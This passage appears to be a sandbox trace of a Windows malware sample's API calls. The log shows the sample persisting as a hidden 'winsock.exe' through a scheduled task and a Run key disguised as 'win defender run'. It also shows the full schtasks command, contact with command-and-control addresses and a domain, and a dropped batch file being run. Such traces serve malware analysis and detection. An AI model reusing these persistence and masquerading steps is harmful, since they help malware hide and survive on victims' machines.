samDesired=0x20019, phkResult=0x19f128 | out: phkResult=0x19f128*=0x590) returned 0x0 [0187.214] RegQueryValueExW (in: hKey=0x590, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x19f144, lpData=0x0, lpcbData=0x19f140*=0x0 | out: lpType=0x19f144*=0x0, lpData=0x0, lpcbData=0x19f140*=0x0) returned 0x2 [0187.214] RegCloseKey (hKey=0x590) returned 0x0 [0187.216] WSAConnect (in: s=0x584, name=0x2237b70*(sa_family=2, sin_port=0x50, sin_addr="208.95.112.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0187.277] closesocket (s=0x550) returned 0 [0187.292] send (s=0x584, buf=0x2238790*, len=144, flags=0) returned 144 [0187.295] setsockopt (s=0x584, level=65535, optname=4102, optval="\x10'", optlen=4) returned 0 [0187.295] recv (in: s=0x584, buf=0x2233b90, len=4096, flags=0 | out: buf=0x2233b90*) returned 468 [0187.325] setsockopt (s=0x584, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0187.326] SetEvent (hEvent=0x3f4) returned 1 [0187.768] EtwEventRegister (in: ProviderId=0x224834c, EnableCallback=0x469066e, CallbackContext=0x0, RegHandle=0x2248328 | out: RegHandle=0x2248328) returned 0x0 [0187.801] GetCurrentProcess () returned 0xffffffff [0187.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee60 | out: TokenHandle=0x19ee60*=0x590) returned 1 [0187.805] GetCurrentProcess () returned 0xffffffff [0187.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee74 | out: TokenHandle=0x19ee74*=0x5a4) returned 1 [0188.118] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe:zone.identifier")) returned 0 [0188.218] GetCurrentProcess () returned 0xffffffff [0188.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f3e4 | out: TokenHandle=0x19f3e4*=0x5bc) returned 1 [0188.222] GetTokenInformation (in: TokenHandle=0x5bc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f3e4 | out: TokenInformation=0x0, ReturnLength=0x19f3e4) returned 0 [0188.223] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5fa1a0 [0188.223] GetTokenInformation (in: TokenHandle=0x5bc, TokenInformationClass=0x8, TokenInformation=0x5fa1a0, TokenInformationLength=0x4, ReturnLength=0x19f3e4 | out: TokenInformation=0x5fa1a0, ReturnLength=0x19f3e4) returned 1 [0188.224] LocalFree (hMem=0x5fa1a0) returned 0x0 [0188.225] DuplicateTokenEx (in: hExistingToken=0x5bc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19f3ec | out: phNewToken=0x19f3ec*=0x5c0) returned 1 [0188.226] CheckTokenMembership (in: TokenHandle=0x5c0, SidToCheck=0x225b030*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f3fc | out: IsMember=0x19f3fc) returned 1 [0188.226] CloseHandle (hObject=0x5c0) returned 1 [0188.226] CloseHandle (hObject=0x5bc) returned 1 [0188.231] CoTaskMemAlloc (cb=0x20e) returned 0x625e30 [0188.231] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x625e30 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0188.231] CoTaskMemFree (pv=0x625e30) [0188.233] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\" /rl HIGHEST /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f1c4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x225b538 | out: lpCommandLine="\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\" /rl HIGHEST /f", lpProcessInformation=0x225b538*(hProcess=0x5c0, hThread=0x5bc, dwProcessId=0x1258, dwThreadId=0x1260)) returned 1 [0188.277] CloseHandle (hObject=0x5bc) returned 1 [0188.277] GetCurrentProcess () returned 0xffffffff [0188.277] GetCurrentProcess () returned 0xffffffff [0188.320] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f3fc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f3fc*=0x5bc) returned 1 [0188.321] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x3e8, cHandles=0x1, pHandles=0x19f3f4*=0x5bc, lpdwindex=0x19f214 | out: lpdwindex=0x19f214) returned 0x80010115 [0188.321] CoGetContextToken (in: pToken=0x19e22c | out: pToken=0x19e22c) returned 0x0 [0188.322] CoGetContextToken (in: pToken=0x19e214 | out: pToken=0x19e214) returned 0x0 [0188.322] CoGetContextToken (in: pToken=0x19e1a0 | out: pToken=0x19e1a0) returned 0x0 [0188.322] WbemLocator:IUnknown:Release (This=0x5c52f8) returned 0x1 [0188.322] WbemLocator:IUnknown:Release (This=0x590540) returned 0x0 [0188.322] CoGetContextToken (in: pToken=0x19e1a0 | out: pToken=0x19e1a0) returned 0x0 [0188.322] IUnknown:Release (This=0x5f3090) returned 0x2 [0188.322] IUnknown:Release (This=0x5f3090) returned 0x1 [0188.324] CoGetContextToken (in: pToken=0x19e22c | out: pToken=0x19e22c) returned 0x0 [0188.324] CoGetContextToken (in: pToken=0x19e1ec | out: pToken=0x19e1ec) returned 0x0 [0188.324] WbemLocator:IUnknown:Release (This=0x5efcb8) returned 0x1 [0188.324] IUnknown:Release (This=0x5be1c0) returned 0x0 [0189.319] CloseHandle (hObject=0x5bc) returned 1 [0189.320] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x19f45c | out: lpExitCode=0x19f45c*=0x103) returned 1 [0189.320] GetCurrentProcess () returned 0xffffffff [0189.320] GetCurrentProcess () returned 0xffffffff [0189.320] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f3e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f3e0*=0x5bc) returned 1 [0189.321] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f3d8*=0x5bc, lpdwindex=0x19f1f4 | out: lpdwindex=0x19f1f4) returned 0x80010115 [0189.321] CloseHandle (hObject=0x5bc) returned 1 [0189.379] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2011f, phkResult=0x19f3e4 | out: phkResult=0x19f3e4*=0x5bc) returned 0x0 [0189.380] RegQueryValueExW (in: hKey=0x5bc, lpValueName="win defender run", lpReserved=0x0, lpType=0x19f400, lpData=0x0, lpcbData=0x19f3fc*=0x0 | out: lpType=0x19f400*=0x1, lpData=0x0, lpcbData=0x19f3fc*=0x64) returned 0x0 [0189.381] RegSetValueExW (in: hKey=0x5bc, lpValueName="win defender run", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\"", cbData=0x76 | out: lpData="\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\"") returned 0x0 [0189.381] RegCloseKey (hKey=0x5bc) returned 0x0 [0189.381] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19efa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0189.382] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", dwFileAttributes=0x2) returned 1 [0189.384] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", nBufferLength=0x105, lpBuffer=0x19ef88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", lpFilePart=0x0) returned 0x38 [0189.385] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", nBufferLength=0x105, lpBuffer=0x19ef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", lpFilePart=0x0) returned 0x2c [0189.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f438) returned 1 [0189.385] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir"), fInfoLevelId=0x0, lpFileInformation=0x225d690 | out: lpFileInformation=0x225d690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf684cc15, ftCreationTime.dwHighDateTime=0x1d7b451, ftLastAccessTime.dwLowDateTime=0xf685cab2, ftLastAccessTime.dwHighDateTime=0x1d7b451, ftLastWriteTime.dwLowDateTime=0xf685cab2, ftLastWriteTime.dwHighDateTime=0x1d7b451, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0189.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f434) returned 1 [0189.387] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", nBufferLength=0x105, lpBuffer=0x19ef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", lpFilePart=0x0) returned 0x2c [0189.387] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir", dwFileAttributes=0x12) returned 1 [0190.039] RoGetParameterizedTypeInstanceIID () returned 0x0 [0190.041] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0190.041] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0190.041] Ro::detail::SimpleMetaDataBuilder::SetStruct () returned 0x0 [0190.041] Ro::detail::SimpleMetaDataBuilder::SetEnum () returned 0x0 [0190.043] RoGetParameterizedTypeInstanceIID () returned 0x0 [0190.044] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0190.044] Ro::detail::SimpleMetaDataBuilder::SetStruct () returned 0x0 [0190.044] Ro::detail::SimpleMetaDataBuilder::SetEnum () returned 0x0 [0190.045] RoGetParameterizedTypeInstanceIID () returned 0x0 [0190.045] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0190.045] Ro::detail::SimpleMetaDataBuilder::SetStruct () returned 0x0 [0190.046] Ro::detail::SimpleMetaDataBuilder::SetEnum () returned 0x0 [0193.711] CreateSemaphoreW (lpSemaphoreAttributes=0x0, lInitialCount=2, lMaximumCount=2, lpName=0x0) returned 0x614 [0193.754] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x618 [0193.802] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x61e5e0 [0193.802] LocalFree (hMem=0x61e5e0) returned 0x0 [0193.803] WSAIoctl (in: s=0x618, dwIoControlCode=0x98000004, lpvInBuffer=0x22d8348, cbInBuffer=0xc, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f45c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f45c, lpOverlapped=0x0) returned 0 [0193.806] WSAConnect (in: s=0x618, name=0x22d83fc*(sa_family=2, sin_port=0x1bb, sin_addr="5.8.88.191"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0214.983] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274c, dwLanguageId=0x0, lpBuffer=0x19f190, nSize=0x101, Arguments=0x0 | out: lpBuffer="A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.\r\n") returned 0xb9 [0215.001] closesocket (s=0x618) returned 0 [0215.204] GetCurrentProcess () returned 0xffffffff [0215.204] GetCurrentThread () returned 0xfffffffe [0215.204] GetCurrentProcess () returned 0xffffffff [0215.204] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f4c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f4c0*=0x618) returned 1 [0215.204] GetCurrentThreadId () returned 0x10bc [0215.204] GetCurrentActCtx (in: lphActCtx=0x19f48c | out: lphActCtx=0x19f48c*=0x0) returned 1 [0215.205] ActivateActCtx (in: hActCtx=0x59d7b4, lpCookie=0x19f49c | out: hActCtx=0x59d7b4, lpCookie=0x19f49c) returned 1 [0215.206] GetCurrentActCtx (in: lphActCtx=0x19f364 | out: lphActCtx=0x19f364*=0x59d7b4) returned 1 [0215.207] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ffe0000 [0215.208] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0215.208] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.d6f29f_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x40280 [0215.209] SetWindowLongW (hWnd=0x40280, nIndex=-4, dwNewLong=2006429408) returned 73991998 [0215.210] GetWindowLongW (hWnd=0x40280, nIndex=-4) returned 2006429408 [0215.211] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea7c | out: phkResult=0x19ea7c*=0x630) returned 0x0 [0215.212] RegQueryValueExW (in: hKey=0x630, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19ea9c, lpData=0x0, lpcbData=0x19ea98*=0x0 | out: lpType=0x19ea9c*=0x0, lpData=0x0, lpcbData=0x19ea98*=0x0) returned 0x2 [0215.212] RegQueryValueExW (in: hKey=0x630, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19ea9c, lpData=0x0, lpcbData=0x19ea98*=0x0 | out: lpType=0x19ea9c*=0x0, lpData=0x0, lpcbData=0x19ea98*=0x0) returned 0x2 [0215.212] RegCloseKey (hKey=0x630) returned 0x0 [0215.213] SetWindowLongW (hWnd=0x40280, nIndex=-4, dwNewLong=73992150) returned 2006429408 [0215.213] GetWindowLongW (hWnd=0x40280, nIndex=-4) returned 73992150 [0215.213] GetWindowLongW (hWnd=0x40280, nIndex=-16) returned 113311744 [0215.213] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x40280, Msg=0x24, wParam=0x0, lParam=0x19ed94) returned 0x0 [0215.213] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x40280, Msg=0x81, wParam=0x0, lParam=0x19ed88) returned 0x1 [0215.214] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x40280, Msg=0x83, wParam=0x0, lParam=0x19ed74) returned 0x0 [0215.215] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x40280, Msg=0x1, wParam=0x0, lParam=0x19ed88) returned 0x0 [0215.215] GetClientRect (in: hWnd=0x40280, lpRect=0x19eab4 | out: lpRect=0x19eab4) returned 1 [0215.215] GetWindowRect (in: hWnd=0x40280, lpRect=0x19eab4 | out: lpRect=0x19eab4) returned 1 [0215.216] GetParent (hWnd=0x40280) returned 0x0 [0215.216] OleInitialize (pvReserved=0x0) returned 0x0 [0215.217] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f43c | out: lplpMessageFilter=0x19f43c*=0x0) returned 0x0 [0215.218] PeekMessageW (in: lpMsg=0x19f410, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f410) returned 0 [0215.219] DeactivateActCtx (dwFlags=0x0, ulCookie=0x17ce0001) returned 1 [0219.021] GetAddrInfoW (in: pNodeName="sockartek.icu", pServiceName=0x0, pHints=0x19f420*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f3c8 | out: ppResult=0x19f3c8*=0x0) returned 11001 [0219.123] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2af9, dwLanguageId=0x0, lpBuffer=0x19f1b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="No such host is known.\r\n") returned 0x18 [0219.242] CoTaskMemAlloc (cb=0x20c) returned 0x61a720 [0219.242] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x61a720 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0219.242] CoTaskMemFree (pv=0x61a720) [0219.243] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19db60, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0219.244] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19db74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0219.476] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat", nBufferLength=0x105, lpBuffer=0x19db68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat", lpFilePart=0x0) returned 0x39 [0219.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19dfc8) returned 1 [0219.476] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkg6lhynlr2l.bat"), fInfoLevelId=0x0, lpFileInformation=0x19e044 | out: lpFileInformation=0x19e044*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19dfc4) returned 1 [0219.477] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat", nBufferLength=0x105, lpBuffer=0x19d9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat", lpFilePart=0x0) returned 0x39 [0219.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19def0) returned 1 [0219.477] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkg6lhynlr2l.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a0 [0219.479] GetFileType (hFile=0x5a0) returned 0x1 [0219.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19deec) returned 1 [0219.479] GetFileType (hFile=0x5a0) returned 0x1 [0219.481] WriteFile (in: hFile=0x5a0, lpBuffer=0x22df2d0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x19df88, lpOverlapped=0x0 | out: lpBuffer=0x22df2d0*, lpNumberOfBytesWritten=0x19df88*=0xde, lpOverlapped=0x0) returned 1 [0219.482] CloseHandle (hObject=0x5a0) returned 1 [0219.489] LocalAlloc (uFlags=0x0, uBytes=0x74) returned 0x54c248 [0219.491] ShellExecuteExW (pExecInfo=0x22e048c*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat", lpParameters=0x0, lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 129 os_tid = 0x9fc Thread: id = 131 os_tid = 0x7d0 Thread: id = 132 os_tid = 0xbc4 [0178.006] CoGetContextToken (in: pToken=0x42efc3c | out: pToken=0x42efc3c) returned 0x800401f0 [0178.006] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0178.006] RoInitialize () returned 0x1 [0178.006] RoUninitialize () returned 0x0 [0186.397] CoGetContextToken (in: pToken=0x42efc30 | out: pToken=0x42efc30) returned 0x0 [0186.397] CoGetContextToken (in: pToken=0x42efbb8 | out: pToken=0x42efbb8) returned 0x0 [0186.397] WbemLocator:IUnknown:Release (This=0x5a8018) returned 0x1 [0186.397] WbemLocator:IUnknown:Release (This=0x5a8018) returned 0x0 [0186.397] CoGetContextToken (in: pToken=0x42efc30 | out: pToken=0x42efc30) returned 0x0 [0186.397] IUnknown:QueryInterface (in: This=0x580168, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x42efbd8 | out: ppvObject=0x42efbd8*=0x580178) returned 0x0 [0186.398] CObjectContext::ContextCallback () returned 0x0 [0188.323] IUnknown:Release (This=0x580178) returned 0x1 [0188.323] CoGetContextToken (in: pToken=0x42efa50 | out: pToken=0x42efa50) returned 0x0 [0188.323] IUnknown:QueryInterface (in: This=0x580168, riid=0x6cc38724*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x42ef9f8 | out: ppvObject=0x42ef9f8*=0x580178) returned 0x0 [0188.324] CObjectContext::ContextCallback () returned 0x0 [0188.379] IUnknown:Release (This=0x580178) returned 0x1 [0188.379] IUnknown:Release (This=0x580168) returned 0x0 [0188.380] IUnknown:Release (This=0x5f3090) returned 0x0 [0188.381] CryptDestroyKey (hKey=0x5a0490) returned 1 [0188.382] CryptReleaseContext (hProv=0x586f58, dwFlags=0x0) returned 1 [0188.382] CryptReleaseContext (hProv=0x586f58, dwFlags=0x0) returned 1 [0188.383] CryptDestroyKey (hKey=0x5a0350) returned 1 [0188.383] CryptReleaseContext (hProv=0x587200, dwFlags=0x0) returned 1 [0188.383] CryptReleaseContext (hProv=0x587200, dwFlags=0x0) returned 1 [0188.383] CryptDestroyKey (hKey=0x5a0710) returned 1 [0188.384] CryptReleaseContext (hProv=0x5874a8, dwFlags=0x0) returned 1 [0188.384] CryptReleaseContext (hProv=0x5874a8, dwFlags=0x0) returned 1 [0188.384] CryptDestroyKey (hKey=0x5a0650) returned 1 [0188.384] CryptReleaseContext (hProv=0x587178, dwFlags=0x0) returned 1 [0188.385] CryptReleaseContext (hProv=0x587178, dwFlags=0x0) returned 1 [0188.386] CryptDestroyKey (hKey=0x5a0590) returned 1 [0188.386] CryptReleaseContext (hProv=0x587288, dwFlags=0x0) returned 1 [0188.386] CryptReleaseContext (hProv=0x587288, dwFlags=0x0) returned 1 [0188.386] CryptDestroyKey (hKey=0x5a05d0) returned 1 [0188.386] CryptReleaseContext (hProv=0x587530, dwFlags=0x0) returned 1 [0188.386] CryptReleaseContext (hProv=0x587530, dwFlags=0x0) returned 1 [0188.387] CryptDestroyKey (hKey=0x5a07d0) returned 1 [0188.387] CryptReleaseContext (hProv=0x587420, dwFlags=0x0) returned 1 [0188.387] CryptReleaseContext (hProv=0x587420, dwFlags=0x0) returned 1 [0188.387] CloseHandle (hObject=0x2d8) returned 1 [0188.388] CryptDestroyKey (hKey=0x5a0550) returned 1 [0188.388] CryptReleaseContext (hProv=0x587068, dwFlags=0x0) returned 1 [0188.388] CryptReleaseContext (hProv=0x587068, dwFlags=0x0) returned 1 Thread: id = 133 os_tid = 0x40c [0182.925] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0182.925] RoInitialize () returned 0x1 [0182.925] RoUninitialize () returned 0x0 [0183.000] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x482f5b4 | out: lpiid=0x482f5b4) returned 0x0 [0183.003] CoGetClassObject (in: rclsid=0x5a197c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6cc354e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x482f2c8 | out: ppv=0x482f2c8*=0x5a7fc8) returned 0x0 [0183.063] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a7fc8, riid=0x6cbe95e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x482f4e0 | out: ppvObject=0x482f4e0*=0x0) returned 0x80004002 [0183.063] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5a7fc8, pUnkOuter=0x0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x482f4f4 | out: ppvObject=0x482f4f4*=0x593398) returned 0x0 [0183.064] WbemDefPath:IUnknown:Release (This=0x5a7fc8) returned 0x0 [0183.064] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x482f114 | out: ppvObject=0x482f114*=0x593398) returned 0x0 [0183.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x482f0d0 | out: ppvObject=0x482f0d0*=0x0) returned 0x80004002 [0183.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x482ecc4 | out: ppvObject=0x482ecc4*=0x0) returned 0x80004002 [0183.065] WbemDefPath:IUnknown:AddRef (This=0x593398) returned 0x3 [0183.065] WbemDefPath:IUnknown:QueryInterface (in: This=0x593398, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, 